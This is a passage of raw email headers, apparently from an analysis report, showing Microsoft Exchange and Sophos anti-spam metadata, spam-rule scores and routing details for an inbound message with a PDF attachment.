Gq9oK5cEPvWHZu7+hpeEcUb6Qq+jBERn4AkQuJHaDda4UftFn5oL0EkBzw0LUX4T8JXli2UmCfMXEtVrDBnGC3dY/ZAz2SjPs91/PZ3jfj9ETAw+gapkGus+8QkrJX4SIKX/iUDIQ/9Ec=
                                    X-Forefront-Antispam-Report-UntrustedCIP:209.85.222.225; CTRY:US; LANG:en; SCL:1; SRV:; IPV:NLI; SFV:NSPM; H:mail-qk1-f225.google.com; PTR:mail-qk1-f225.google.com; CAT:NONE; SFS:(13230040)(43022699015)(8096899003)(58100299016); DIR:INB;
                                    X-MS-Exchange-Transport-CrossTenantHeadersStampedGVXPR03MB10803
                                    X-Sophos-Email-Scan-Details27140d1e1540510e7e771140550e7d75
                                    X-Sophos-Email[eu-west-1] Antispam-Engine: 6.0.1, AntispamData: 2025.1.13.81246
                                    X-Sophos-SenderHistoryip=209.85.222.225, fs=54107400, fso=201049384, da=230216430, mc=3697, sc=29, hc=3668, sp=1, re=385, sd=1, hd=13
                                    X-Sophos-DomainHistoryd=capitaltractorinc.com, fs=2206, fso=38437676, da=90959254, mc=7, sc=0, hc=7, sp=0, re=43, sd=0, hd=0
                                    X-LASED-From-ReplyTo-DiffFrom:<cardfactory.co.uk>:13
                                    X-LASED-SpamProbability0.135873
                                    X-LASED-HitsATTACHED_OCT_STRM_PDF 0.100000, AUTH_RES_PASS 0.000000, BODYTEXTH_SIZE_10000_LESS 0.000000, BODYTEXTP_SIZE_3000_LESS 0.000000, BODYTEXTP_SIZE_400_LESS 0.000000, BODY_SIZE_10000_PLUS 0.000000, BODY_SIZE_100K_PLUS 0.000000, BODY_SIZE_25K_PLUS 0.000000, BODY_SIZE_50K_PLUS 0.000000, BODY_SIZE_75K_PLUS 0.000000, DATE_TZ_NA 0.000000, DKIM_SIGNATURE 0.000000, DQ_S_H 0.000000, FROM_NAME_PHRASE 0.000000, HTML_90_100 0.100000, HTML_95_100 0.100000, HTML_98_100 0.100000, HTML_999_100 0.600000, HTML_99_100 0.100000, HTML_FONT_INVISIBLE 0.100000, HTML_NO_HTTP 0.100000, IMP_FROM_NOTSELF 0.000000, INBOUND_SOPHOS 0.000000, INBOUND_SOPHOS_TOP_REGIONS 0.000000, KNOWN_MTA_TFX 0.000000, NO_CTA_URI_FOUND 0.000000, NO_FUR_HEADER 0.000000, NO_URI_FOUND 0.000000, NO_URI_HTTPS 0.000000, OBFUSCATION 0.000000, PDF_ATTACHED 0.000000, PDF_ATTACHED_2 0.000000, PDF_SIZE_100K_PLUS 0.000000, PDF_VERSION_1_4 0.000000, SXL_IP_TFX_WM 0.000000, WEBMAIL_SOURCE 0.000000, __ATTACHMENT_NOT_IMG 0.000000, __ATTACHMENT_SIZE_100K_PLUS 0.000000, __ATTACH_CTE_BASE64 0.000000, __AUTH_RES_DKIM_PASS 0.000000, __AUTH_RES_DMARC_PASS 0.000000, __AUTH_RES_PASS 0.000000, __BODY_NO_MAILTO 0.000000, __CT 0.000000, __CTYPE_HAS_BOUNDARY 0.000000, __CTYPE_MULTIPART 0.000000, __CTYPE_MULTIPART_MIXED 0.000000, __DQ_D_H 0.000000, __DQ_IP_FSO_LARGE 0.000000, __DQ_NEG_DOMAIN 0.000000, __DQ_NEG_HEUR 0.000000, __DQ_NEG_IP 0.000000, __DQ_S_DOMAIN_100K 0.000000, __DQ_S_DOMAIN_10K 0.000000, __DQ_S_DOMAIN_HD_0 0.000000, __DQ_S_DOMAIN_HIST_1 0.000000, __DQ_S_DOMAIN_MC_1_P 0.000000, __DQ_S_DOMAIN_MC_5_P 0.000000, __DQ_S_DOMAIN_RE_49_L 0.000000, __DQ_S_DOMAIN_RE_99_L 0.000000, __DQ_S_DOMAIN_SP_0_P 0.000000, __DQ_S_HIST_1 0.000000, __DQ_S_HIST_2 0.000000, __DQ_S_IP_HD_10_P 0.000000, __DQ_S_IP_MC_100_P 0.000000, __DQ_S_IP_MC_10_P 0.000000, __DQ_S_IP_MC_1K_P 0.000000, __DQ_S_IP_MC_1_P 0.000000, __DQ_S_IP_MC_5_P 0.000000, __DQ_S_IP_RE_100_P 0.000000, __DQ_S_IP_SC_10_P 0.000000, __DQ_S_IP_SC_1_P 0.000000, __DQ_S_IP_SC_5_P 0.000000, __DQ_S_IP_SD_1_P 0.000000, __FRAUD_MONEY_CURRENCY 0.000000, __FRAUD_MONEY_CURRENCY_DOLLAR 0.000000, __FROM_3RD_PARTY 0.000000, __FROM_DOMAIN_NOT_IN_BODY 0.000000, __FROM_NAME_NOT_IN_ADDR 0.000000, __FROM_NAME_NOT_IN_BODY 0.000000, __FUR_RDNS_GMAIL 0.000000, __HAS_ATTACHMENT 0.000000, __HAS_ATTACHMENT1 0.000000, __HAS_ATTACHMENT2 0.000000, __HAS_FROM 0.000000, __HAS_HTML 0.000000, __HAS_MSGID 0.000000, __HAS_X_FF_ASR 0.000000, __HAS_X_FF_ASR_CAT 0.000000, __HAS_X_FF_ASR_SFV 0.000000, __HEADER_ORDER_FROM 0.000000, __HIDDEN_HTML_CONTENT 0.000000, __HTML_BAD_START 0.000000, __IMP_FROM_NOTSELF 0.000000, __INBOUND_SOPHOS_EU_WEST_1 0.000000, __JSON_HAS_MODELS 0.000000, __JSON_HAS_SCHEMA_VERSION 0.000000, __JSON_HAS_SENDER_AUTH 0.000000, __JSON_HAS_TENANT_DOMAINS 0.000000, __JSON_HAS_TENANT_ID 0.000000, __JSON_HAS_TENANT_SCHEMA_VERSION 0.000000, __JSON_HAS_TENANT_VIPS 0.000000, __JSON_HAS_TRACKING_ID 0.000000, __MIME_ATTACHMENT_1_N 0.000000, __MIME_ATTACHMENT_N_2 0.000000, __MIME_HTML 0.000000, __MIME_TEXT_H 0.000000, __MIME_TEXT_H1 0.000000, __MIME_TEXT_H2 0.000000, __MIME_TEXT_P 0.000000, __MIME_TEXT_P1 0.000000, __MIME_TEXT_P2 0.000000, __MIME_VERSION 0.000000, __MSGID_MX_GOOGLE 0.000000, __MTHREAT_15 0.000000, __MTL_15 0.000000, __OCTET_STREAM_ATTACHED 0.000000, __PDF_SUBTYPE_IMG_SAME_W_H 0.000000, __RCVD_PASS 0.000000, __RDNS_WEBMAIL 0.000000, __SANE_MSGID 0.000000, __SCAN_DETAILS 0.000000, __SCAN_DETAILS_SANE 0.000000, __SCAN_DETAILS_TL_0 0.000000, __STOCK_PHRASE_7 0.000000, __TO_MALFORMED_2 0.000000, __TO_NO_NAME 0.000000, __URI_NO_MAILTO 0.000000, __X_FF_ASR_SCL_NSP 0.000000, __X_FF_ASR_SFV_NSPM 0.000000, __X_GM_MESSAGE_STATE 0.000000, __X_GOOGLE_DKIM_SIGNATURE 0.000000, __X_GOOGLE_SMTP_SOURCE 0.000000, __YOUTUBE_RCVD 0.000000
                                    X-LASED-ImpersonationFalse
                                    X-LASED-SpamNonSpam
                                    X-Sophos-MH-Mail-Info-KeyNFlXbTR4Mm5WMnp2UHJyLTE3Mi4xOS4xLjk5
                                    Return-Pathd.plowinske@capitaltractorinc.com
                                    X-MS-Exchange-Organization-ExpirationStartTime13 Jan 2025 08:43:45.8166 (UTC)
                                    X-MS-Exchange-Organization-ExpirationStartTimeReasonOriginalSubmit
                                    X-MS-Exchange-Organization-ExpirationInterval1:00:00:00.0000000
                                    X-MS-Exchange-Organization-ExpirationIntervalReasonOriginalSubmit
                                    X-MS-Exchange-Organization-Network-Message-Id56572ce3-06ef-431c-51bf-08dd33ae6465
                                    X-MS-Exchange-Organization-MessageDirectionalityIncoming
                                    X-MS-Exchange-Transport-CrossTenantHeadersStrippedAMS0EPF00000194.eurprd05.prod.outlook.com
                                    X-MS-PublicTrafficTypeEmail
                                    X-MS-Exchange-Organization-AuthSourceAMS0EPF00000194.eurprd05.prod.outlook.com
                                    X-MS-Exchange-Organization-AuthAsAnonymous
                                    X-MS-Office365-Filtering-Correlation-Id-Prvs3e008e1c-4ebb-4e22-7574-08dd33ae5f70
                                    X-MS-Exchange-Organization-SCL-1
                                    X-Microsoft-AntispamBCL:0;ARA:13230040|43022699015|35042699022|8096899003|58100299016;
                                    X-Forefront-Antispam-ReportCIP:198.154.180.197;CTRY:US;LANG:en;SCL:-1;SRV:;IPV:NLI;SFV:SKN;H:mfid-euw1.prod.hydra.sophos.com;PTR:mfid-euw1.prod.hydra.sophos.com;CAT:NONE;SFS:(13230040)(43022699015)(35042699022)(8096899003)(58100299016);DIR:INB;
                                    X-MS-Exchange-CrossTenant-OriginalArrivalTime13 Jan 2025 08:43:45.7228 (UTC)
                                    X-MS-Exchange-CrossTenant-Network-Message-Id56572ce3-06ef-431c-51bf-08dd33ae6465
                                    X-MS-Exchange-CrossTenant-Id7956b84e-0c99-46b5-81c6-28689cfa7221
                                    X-MS-Exchange-CrossTenant-AuthSourceAMS0EPF00000194.eurprd05.prod.outlook.com
                                    X-MS-Exchange-CrossTenant-AuthAsAnonymous
                                    X-MS-Exchange-CrossTenant-FromEntityHeaderInternet
                                    X-MS-Exchange-Transport-EndToEndLatency00:00:05.7999896
                                    X-MS-Exchange-Processed-By-BccFoldering15.20.8335.010
                                    X-Microsoft-Antispam-Mailbox-Deliveryucf:0;jmr:0;auth:0;dest:I;ENG:(910001)(944506478)(944626604)(920097)(930097)(140003);
                                    X-Microsoft-Antispam-Message-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
                                    MIME-Version1.0

                                    Icon Hash:46070c0a8e0c67d6